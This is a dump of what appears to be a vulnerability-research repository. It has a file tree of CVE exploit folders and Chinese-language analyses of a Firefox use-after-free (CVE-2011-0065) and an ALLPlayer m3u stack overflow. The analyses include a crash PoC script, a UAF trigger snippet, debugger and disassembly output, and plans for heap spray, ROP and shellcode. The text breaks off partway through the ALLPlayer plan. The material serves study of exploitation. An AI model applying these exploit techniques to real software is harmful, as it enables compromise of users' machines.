├── Article ├── 0sc-p │ ├── Images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── poc.py ├── File │ └── 缓冲区溢出.zip ├── Rop 实战之利用 VirtualProtect绕过DEP.docx └── windowsh环境下shllcode编写.docx ├── Browser Vulnerability ├── CVE-2011-0065 │ ├── 1.png │ ├── Firefox_Setup_3.6.16.exe │ ├── OllyFindAddr.dll │ ├── analysis.md │ ├── exp.html │ ├── exploit.HTML │ └── poc.html └── Exploit-Win-8.1-Pre-IE-11-64-bit │ ├── Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview.html │ ├── Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files │ ├── 202786884-widgets.js.下载 │ ├── 2437439463-css_bundle_v2.css │ ├── 25936583-postmessagerelay.js.下载 │ ├── 368954415-lightbox_bundle.css │ ├── 3802865867-lbx.js.下载 │ ├── analytics.js.下载 │ ├── array.png │ ├── authorization.css │ ├── cb=gapi(1).loaded_0 │ ├── cb=gapi(2).loaded_1 │ ├── cb=gapi(3).loaded_0 │ ├── cb=gapi.loaded_0 │ ├── cb=gapi.loaded_1 │ ├── cb=gapi.loaded_2 │ ├── cb=gapi.loaded_3 │ ├── fastbutton.html │ ├── ghost-rider-lego.jpg │ ├── lazy.min.js.下载 │ ├── mem.png │ ├── my_photo.jpg │ ├── navbar.html │ ├── photo(1).jpg │ ├── photo.jpg │ ├── platform_gapi.iframes.style.common.js.下载 │ ├── plusone.js.下载 │ ├── postmessageRelay.html │ ├── rpc_shindig_random.js.下载 │ ├── rs=AGLTcCNs5888EhQ53gL5wA6TSup-ZHQ8wg │ ├── screenshot.png │ ├── spbsg.jpg │ ├── string.png │ ├── translateelement.css │ └── zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35 │ ├── analysis.md │ ├── exp.html │ └── poc.html ├── Bypass └── COOP-Oakland15.pdf ├── File Format Vulnerability ├── ALLPlayerEN_6.7_stackoverflow │ ├── ALLPlayer.exe │ ├── ALLPlayerEN_6.7.0.exe │ ├── ALLPlayerEN_6.7_栈溢出分析.docx │ ├── ALLPlayerEN_6.7_栈溢出分析.md │ ├── ALLPlayer_Poc.m3u │ ├── analysis.txt │ ├── calc.m3u │ ├── exp.py │ ├── exp1.py │ ├── ntdll.dll │ ├── ntdll.idb │ ├── player.m3u │ ├── poc.py │ └── rekt.m3u ├── CVE-2010-3333 │ ├── 1.png │ ├── MSO.DLL │ ├── analysis.md │ ├── 
moonagirl.rtf │ ├── msf.rtf │ └── unMSO.DLL ├── CVE-2012-0158 │ └── exp.rtf ├── CVE-2013-7409 │ └── poc.py ├── CVE-2017-11882 │ ├── DATA │ ├── File │ │ ├── carsh1.docx │ │ ├── carsh2.docx │ │ ├── carsh3.docx │ │ └── exploit-calc.docx │ ├── Images │ │ ├── EQNOLEFILEHDR.png │ │ ├── Equation-Native.png │ │ ├── FONT-record.png │ │ ├── IPersistStorage-Load.png │ │ ├── IPersistStorage-interface.png │ │ ├── IPersistStorage.png │ │ ├── MTEF-Byte-Stream.png │ │ ├── MTEF-header.png │ │ ├── ReadMTEFData.png │ │ ├── Tag-byte-structure.png │ │ ├── Test-rtf-Equation-Native.png │ │ ├── Test-rtf.png │ │ ├── exploit-rtf-Equation-Native.png │ │ ├── functions.png │ │ ├── interface.png │ │ ├── oleinit.png │ │ ├── ret.png │ │ └── stackoverflow.png │ ├── OleFileView.zip │ ├── eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe │ ├── eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb │ ├── exploit.md │ ├── knowledge.md │ ├── patch.md │ └── skills.md └── CVE-2018-4878 │ ├── CVE-2018-4878-master.zip │ ├── CVE-2018-4878.rar │ ├── Poc │ ├── CVE-2018-4878漏洞分析.docx │ ├── Poc.as3proj │ ├── bin │ │ ├── Poc.swf │ │ ├── expressInstall.swf │ │ ├── index.html │ │ └── js │ │ │ └── swfobject.js │ ├── obj │ │ ├── PocConfig.old │ │ └── PocConfig.xml │ └── src │ │ └── Poc │ │ ├── Main.as │ │ └── MyListener.as │ ├── analysis.md │ ├── cve-2018-4878.py │ └── malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip ├── Fuzzer ├── AFL初探.md ├── AFl文件变异.md ├── afl1.png ├── eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf ├── fuzz Adobe Reader.md ├── post_fuzzing-reader-wtf.png └── the_art_of_fuzzing_slides.pdf ├── History ├── CFG原理及绕过技巧.md ├── CFI │ └── CFI.md ├── Images │ ├── after.png │ ├── aslr.png │ ├── before.png │ ├── bypass.png │ ├── cfg.png │ ├── dep-kernel.png │ ├── dep.png │ ├── dkohm.png │ ├── exec.png │ ├── gs1.0.png │ ├── gs1.1.png │ ├── gs2.0.png │ ├── guard.png │ ├── heap.png │ ├── heap1.png │ ├── kernel-stack.png │ ├── lfh.png │ ├── listentry.png │ ├── mm.png │ ├── 
pre.png │ ├── rand.png │ ├── safe.png │ ├── safeseh1.png │ ├── sealed.png │ ├── sehop.png │ ├── sehop1.png │ ├── shellcode.png │ ├── unlink.png │ ├── vtg.png │ ├── win1.png │ ├── win2.png │ ├── win3.png │ ├── win7.png │ └── win8.png ├── PAC │ ├── pac.md │ ├── slides_23.pdf │ └── whitepaper-pointer-authentication-on-armv8-3.pdf ├── RFG原理.md ├── Windows漏洞防护与利用发展史-内核层.md ├── Windows漏洞防护与利用发展史-应用层.md ├── afl.md └── trendmicro.md ├── README.md └── Windows Kernel Vulnerability ├── CVE-2014-1767 ├── 1 │ ├── CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园.html │ └── CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files │ │ ├── 24442-20171206093644566-325426505.png │ │ ├── 24442-20171208101900738-116140477.jpg │ │ ├── 928323-20160501120056941-521000199.png │ │ ├── 928323-20160501120057535-1926957792.png │ │ ├── 928323-20160501120058175-1651279641.png │ │ ├── 928323-20160501120058644-274645935.png │ │ ├── 928323-20160501120059128-479937764.png │ │ ├── 928323-20160501120059785-318854944.png │ │ ├── 928323-20160501120100347-1097263581.png │ │ ├── 928323-20160501120100738-1402769642.png │ │ ├── 928323-20160501120101300-47970014.png │ │ ├── 928323-20160501120102066-439387585.png │ │ ├── 928323-20160501120102503-260248986.png │ │ ├── 928323-20160501120102894-799784821.png │ │ ├── 928323-20160501120103425-20637235.png │ │ ├── 928323-20160501120103894-2146368649.png │ │ ├── 928323-20160501120104410-1243386177.png │ │ ├── 928323-20160501120104863-2088752860.png │ │ ├── 928323-20160501120105285-1813557857.png │ │ ├── 928323-20160501120105707-991419323.png │ │ ├── 928323-20160501120106019-1901645584.png │ │ ├── 928323-20160501120106769-1978294529.png │ │ ├── 928323-20160501120107425-1893723380.png │ │ ├── 928323-20160501120108128-1338026729.png │ │ ├── 928323-20160501120108738-2074080055.png │ │ ├── 928323-20160501120109222-836873254.png │ │ ├── 928323-20160501120109894-475395427.png │ │ ├── 928323-20160501120110363-835793604.png │ │ ├── 928323-20160501120110863-489063356.png │ │ ├── 
928323-20160501120111488-32302803.png │ │ ├── InsertCode.gif │ │ ├── analytics.js.下载 │ │ ├── b.png │ │ ├── base.js.下载 │ │ ├── blog-common.css │ │ ├── blog-common.js.下载 │ │ ├── bundle-LessIsMore-mobile.css │ │ ├── bundle-LessIsMore.css │ │ ├── get │ │ ├── icon_weibo_24.png │ │ ├── img.gif │ │ ├── indent.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── lk.png │ │ ├── mention.js.下载 │ │ ├── quote.gif │ │ ├── sample_face.gif │ │ └── wechat.png ├── 2 │ ├── CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园.html │ └── CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files │ │ ├── 24442-20171206093644566-325426505.png │ │ ├── 24442-20171208101900738-116140477.jpg │ │ ├── 928323-20160501123856410-1417966897.png │ │ ├── 928323-20160501123856816-1716396550.png │ │ ├── 928323-20160501123857238-1357395101.png │ │ ├── InsertCode.gif │ │ ├── analytics.js.下载 │ │ ├── b.png │ │ ├── base.js.下载 │ │ ├── blog-common.css │ │ ├── blog-common.js.下载 │ │ ├── bundle-LessIsMore-mobile.css │ │ ├── bundle-LessIsMore.css │ │ ├── copycode.gif │ │ ├── encoder.js.下载 │ │ ├── get │ │ ├── icon_weibo_24.png │ │ ├── img.gif │ │ ├── indent.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── lk.png │ │ ├── mention.js.下载 │ │ ├── quote.gif │ │ ├── sample_face.gif │ │ └── wechat.png ├── 3 │ ├── CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu.html │ └── CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu_files │ │ ├── 10.jpg │ │ ├── 4.jpg │ │ ├── 5.jpg │ │ ├── 8.jpg │ │ ├── 9.jpg │ │ ├── WpPineapple.js(1).下载 │ │ ├── WpPineapple.js.下载 │ │ ├── bootstrap.min.css │ │ ├── bootstrap.min.js.下载 │ │ ├── codebox.css │ │ ├── codebox.js.下载 │ │ ├── ga.js.下载 │ │ ├── jquery.js(1).下载 │ │ ├── jquery.js.下载 │ │ ├── jquery.notice.css │ │ ├── jquery.notice.js.下载 │ │ └── style.css ├── Cve-2014-1767.rar ├── Pwn2Own_2014_AFD.sys_privilege_escalation.pdf ├── afd.$$$ ├── afd.id0 ├── afd.id1 ├── afd.id2 ├── afd.nam ├── 
afd.sys ├── afd.til ├── afd_1767_Exp.zip ├── afd_1767_win32_Exp.cpp ├── analysis.md └── cve-2014-1767_Afd.sys_double-free分析与利用.pdf └── CVE-2017-0047 ├── analysis.md ├── exp.c ├── know.md ├── poc.zip └── win32k.sys /Article/0sc-p/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/1.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/2.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/3.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/4.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/5.png -------------------------------------------------------------------------------- /Article/File/缓冲区溢出.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/File/缓冲区溢出.zip -------------------------------------------------------------------------------- /Article/Rop 实战之利用 VirtualProtect绕过DEP.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/Rop 实战之利用 VirtualProtect绕过DEP.docx -------------------------------------------------------------------------------- /Article/windowsh环境下shllcode编写.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/windowsh环境下shllcode编写.docx -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/1.png -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/Firefox_Setup_3.6.16.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/Firefox_Setup_3.6.16.exe -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/OllyFindAddr.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/OllyFindAddr.dll -------------------------------------------------------------------------------- /Browser 
Vulnerability/CVE-2011-0065/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | 在nsObjectLoadingContent::OnChannelRedirect函数中,当mChannel对象未被分配时,会临时赋予一个新对象值,而该新对象值在函数返回后会被回收释放, 4 | 导致mChannel成为悬挂指针。 5 | 6 | 程序又在后面的nsObjectLoadingContent::LoadObject函数中引用了悬挂指针mChannel,调用mChannel对象的函数,最终导致UAF漏洞的发生。 7 | 8 | ## 漏洞利用 9 | 10 | 为了实现任意代码执行,需要在mChannel对象释放后,用可控数据“占坑”填充它,因此,可在onChannelRedirect函数调用完成后,紧跟着申请一块大小相同的内存: 11 | 12 | e = document.getElementById("d"); 13 | 14 | e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0) 15 | 16 | fake_obj_addr = unescape("\x1C%u0c0c") 17 | 18 | 执行后,虚表指针就会被0x0c0c001c填充,从而控制程序的执行流程 19 | 20 | 之后再结合堆喷技术+VirtualProtect执行shellcode实现利用 21 | 22 | ![](./1.png) 23 | 24 | ## -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/exp.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 32 | -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/exploit.HTML: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 32 | -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 12 | 13 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/25936583-postmessagerelay.js.下载: -------------------------------------------------------------------------------- 1 | var h=this,q=function(a,c){a=a.split(".");var b=h;a[0]in b||"undefined"==typeof b.execScript||b.execScript("var "+a[0]);for(var
d;a.length&&(d=a.shift());)a.length||void 0===c?b=b[d]&&b[d]!==Object.prototype[d]?b[d]:b[d]={}:b[d]=c},r=function(a,c){function b(){}b.prototype=c.prototype;a.o=c.prototype;a.prototype=new b;a.prototype.constructor=a;a.m=function(a,b,f){for(var e=Array(arguments.length-2),d=2;db;b+=4)c[b/4]=a[b]<<24|a[b+1]<<16|a[b+2]<<8|a[b+3];for(b=16;80>b;b++)a=c[b-3]^c[b-8]^c[b-14]^c[b-16],c[b]=(a<<1|a>>>31)&4294967295;a=e[0];var d=e[1],f=e[2],l=e[3],g=e[4];for(b=0;80>b;b++){if(40>b)if(20>b){var k=l^d&(f^l);var n=1518500249}else k=d^f^l,n=1859775393;else 60>b?(k=d&f|l&(d|f),n=2400959708):(k=d^f^l,n=3395469782);k=((a<<5|a>>>27)&4294967295)+ 4 | k+g+n+c[b]&4294967295;g=l;l=f;f=(d<<30|d>>>2)&4294967295;d=a;a=k}e[0]=e[0]+a&4294967295;e[1]=e[1]+d&4294967295;e[2]=e[2]+f&4294967295;e[3]=e[3]+l&4294967295;e[4]=e[4]+g&4294967295}function b(a,b){if("string"===typeof a){a=unescape(encodeURIComponent(a));for(var e=[],d=0,l=a.length;dg?b(n,56-g):b(n,64-(g-56));for(var p=63;56<=p;p--)f[p]=d&255,d>>>=8;c(f);for(p=d=0;5>p;p++)for(var m=24;0<=m;m-=8)a[d++]=e[p]>>m&255;return a}for(var e=[],f=[],m=[],n=[128],B=1;64>B;++B)n[B]=0;var g,k;a();return{reset:a,update:b,digest:d,digestString:function(){for(var a=d(),b="",c=0;ca.length)return null;c=a[0];b=gadgets.rpc.getOrigin(a[1]);if(b!==a[1])return null;a=a.slice(2);return(a=(b&&c?["session_state",aa(G(b),c,a||[])].join(" "):null)||"")&&a.substr(14)||null},K=function(a,c,b){this.i=String(a||"");this.f=String(c||"");this.a=String(b||"");this.b={};this.j=this.l=this.g=this.h="";this.c=null}; 6 | K.prototype.evaluate=function(){var a={},c="";try{c=String(document.cookie||"")}catch(m){}c=c.split("; ").join(";").split(";");for(var b=0,d=c.length;b 2 | 3 | 21 | 22 | 23 | 24 |
25 |
26 | 28 | 31 | 37 |
27 |
29 |
30 |
32 | 33 | 34 | 更多 35 | 36 | 下一个博客»
40 | 49 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo(1).jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo(1).jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo.jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/postmessageRelay.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser 
Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/screenshot.png -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/spbsg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/spbsg.jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/string.png -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 
Preview_files/zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35 -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/poc.html: -------------------------------------------------------------------------------- 1 | 11 | 12 |
aaaaaaaaaa aaaaaaaaaa
13 |
aaaaaaaaaa aaaaaaaaaa
14 |
aaaaaaaaaa aaaaaaaaaa
15 |
aaaaaaaaaa aaaaaaaaaa
16 |
aaaaaaaaaa aaaaaaaaaa
17 |
aaaaaaaaaa aaaaaaaaaa
-------------------------------------------------------------------------------- /Bypass/COOP-Oakland15.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Bypass/COOP-Oakland15.pdf -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer.exe -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7.0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7.0.exe -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.docx -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.md: -------------------------------------------------------------------------------- 1 | ## 1 结合poc定位漏洞 2 | 从github上找到了poc 3 | 4 | junk = "http://" 5 | buffer="\x41" * 5000 6 | exploit = junk + buffer 7 | try: 8 | out_file = open("ALLPlayer_Poc.m3u",'w') 9 | out_file.write(exploit) 10 
| out_file.close() 11 | print "Exploit file created!" 12 | except: 13 | print "Error" 14 | 15 | 用ALLPlayer打开poc生成的ALLPlayer_Poc.m3u,程序崩溃 16 | 17 | This exception may be expected and handled. 18 | eax=00120041 ebx=066bb35c ecx=00130000 edx=066bc8d4 esi=00001390 edi=00000000 19 | eip=7c932f4e esp=0012ea2c ebp=0012ea2c iopl=0 nv up ei pl nz na pe nc 20 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 21 | ntdll!wcscpy+0xe: 22 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 23 | 24 | wcscpy函数把从src地址开始且含有'\0000'结束符的字符串复制到以dest开始的地址空间,返回值的类型为wchar_t* #Unicode 25 | 26 | ntdll!wcscpy: 27 | 7c932f40 8bff mov edi,edi 28 | 7c932f42 55 push ebp 29 | 7c932f43 8bec mov ebp,esp 30 | 7c932f45 8b4d08 mov ecx,dword ptr [ebp+8] #char *strDestination 31 | 7c932f48 8b550c mov edx,dword ptr [ebp+0Ch] #char *strSource 32 | 7c932f4b 668b02 mov ax,word ptr [edx] 33 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 34 | 35 | wcscpy函数 36 | 37 | __int16 *__cdecl wcscpy(__int16 *a1, __int16 *a2)# {# __int16 *des; // ecx 38 | __int16 *sou; // edx 39 | __int16 index; // ax 40 | des = a1; 41 | sou = a2; 42 | do 43 | { 44 | index = *sou; 45 | *des = *sou; 46 | ++des; 47 | ++sou; 48 | } 49 | while ( index ); 50 | return a1; 51 | } 52 | 查看ebp内容 53 | 54 | 0:000> dd ebp 55 | 0012ea2c 0012ea60 7c80bb10 0012ea88 066bb35c 56 | 查看源字符串内容 57 | 58 | 0:000> dd 0012ea88 59 | 0012ea88 00740068 00700074 002f003a 0041002f 60 | 0012ea98 00410041 00410041 00410041 00410041 61 | 0012eaa8 00410041 00410041 00410041 00410041 62 | 0012eab8 00410041 00410041 00410041 00410041 63 | 0012eac8 00410041 00410041 00410041 00410041 64 | 0012ead8 00410041 00410041 00410041 00410041 65 | 0012eae8 00410041 00410041 00410041 00410041 66 | 0012eaf8 00410041 00410041 00410041 00410041 67 | 68 | 目标字符串内容 69 | 70 | 0:000> dd 066bb35c 71 | 066bb35c 00740068 00700074 002f003a 0041002f 72 | 066bb36c 00410041 00410041 00410041 00410041 73 | 066bb37c 00410041 00410041 00410041 00410041 74 | 066bb38c 
00410041 00410041 00410041 00410041 75 | 066bb39c 00410041 00410041 00410041 00410041 76 | 066bb3ac 00410041 00410041 00410041 00410041 77 | 066bb3bc 00410041 00410041 00410041 00410041 78 | 066bb3cc 00410041 00410041 00410041 00410041 79 | 80 | 查看函数调用 81 | 82 | 0:000> kv 83 | ChildEBP RetAddr Args to Child 84 | 0012ea2c 7c80bb10 0012ea88 066cb35c 00000000 ntdll!wcscpy+0xe (FPO: [Non-Fpo]) 85 | 0012ea60 00699632 0012ea88 066cb35c 0012ecf0 kernel32!lstrcpyW+0x1c (FPO: [Non-Fpo]) 86 | WARNING: Stack unwind information not available. Following frames may be wrong. 87 | 0012ecdc 00410041 00410041 00410041 00410041 ALLPlayer!TMethodImplementationIntercept+0x22cb3e 88 | 0012ece0 00410041 00410041 00410041 00410041 ALLPlayer+0x10041 89 | 90 | 可以看到ALLPlayer!TMethodImplementationIntercept+0x22cb3e是ntdll!wcscpy的调用者 91 | 92 | 93 | 在ida中找到ALLPlayer!TMethodImplementationIntercept+0x22cb3e处 94 | 95 | .text:0069960A loc_69960A: ; CODE XREF: .text:006995FC↑j 96 | .text:0069960A pushebx 97 | .text:0069960B calllstrlenW_0_0 98 | .text:00699610 mov esi, eax 99 | .text:00699612 inc esi 100 | .text:00699613 lea eax, [ebp-254h] 101 | .text:00699619 xor ecx, ecx 102 | .text:0069961B mov edx, 104h 103 | .text:00699620 callsub_407B64 104 | .text:00699625 pushebx <-------------- 源字符串 105 | .text:00699626 lea eax, [ebp-254h] 106 | .text:0069962C pusheax <---------------目标缓冲区 107 | .text:0069962D calllstrcpyW <-------------- 崩溃触发点 108 | .text:00699632 mov eax, [ebp+8] 109 | 110 | 在该函数中下断再重新打开ALLPlayer_Poc.m3u,断下 111 | 112 | 0:005> bp ALLPlayer!TMethodImplementationIntercept+0x22cb1e 113 | 0:005> g 114 | Breakpoint 1 hit 115 | eax=0000138f ebx=066bb35c ecx=7c809ac6 edx=0000000a esi=0000138f edi=00000000 116 | eip=00699612 esp=0012ea70 ebp=0012ecdc iopl=0 nv up ei ng nz na pe nc 117 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 118 | ALLPlayer!TMethodImplementationIntercept+0x22cb1e: 119 | 00699612 46 inc esi 120 | 121 | 查看关键位置 122 | 123 | 0:000> dd eax 124 | 0012ea88 00000000 
00000000 00000000 00000000 125 | 0012ea98 00000000 00000000 00000000 00000000 126 | 0012eaa8 00000000 00000000 00000000 00000000 127 | 0012eab8 00000000 00000000 00000000 00000000 128 | 0012eac8 00000000 00000000 00000000 00000000 129 | 0012ead8 00000000 00000000 00000000 00000000 130 | 0012eae8 00000000 00000000 00000000 00000000 131 | 0012eaf8 00000000 00000000 00000000 00000000 132 | 0:000> dd ebx 133 | 066bb35c 00740068 00700074 002f003a 0041002f 134 | 066bb36c 00410041 00410041 00410041 00410041 135 | 066bb37c 00410041 00410041 00410041 00410041 136 | 066bb38c 00410041 00410041 00410041 00410041 137 | 066bb39c 00410041 00410041 00410041 00410041 138 | 066bb3ac 00410041 00410041 00410041 00410041 139 | 066bb3bc 00410041 00410041 00410041 00410041 140 | 066bb3cc 00410041 00410041 00410041 00410041 141 | 0:000> dd esp 142 | 0012ea6c 066bb35c 0012ecf0 00699791 0012ecdc 143 | 0012ea7c 00b55bf8 066bb35c 00000000 00000000 144 | 0012ea8c 00000000 00000000 00000000 00000000 145 | 0012ea9c 00000000 00000000 00000000 00000000 146 | 0012eaac 00000000 00000000 00000000 00000000 147 | 0012eabc 00000000 00000000 00000000 00000000 148 | 0012eacc 00000000 00000000 00000000 00000000 149 | 0012eadc 00000000 00000000 00000000 00000000 150 | 151 | 至此我们知道这是一个栈溢出,当ebx中的字符串足够长时,会覆盖函数返回地址以及栈中的一些重要数据 152 | 153 | ## 2 漏洞利用 154 | 障碍:实验环境winxp sp3 开启了DEP,GS等保护 155 | 156 | 思路: 157 | 158 | - 1)通过构造ROP构造出可以执行的内存块 159 | - 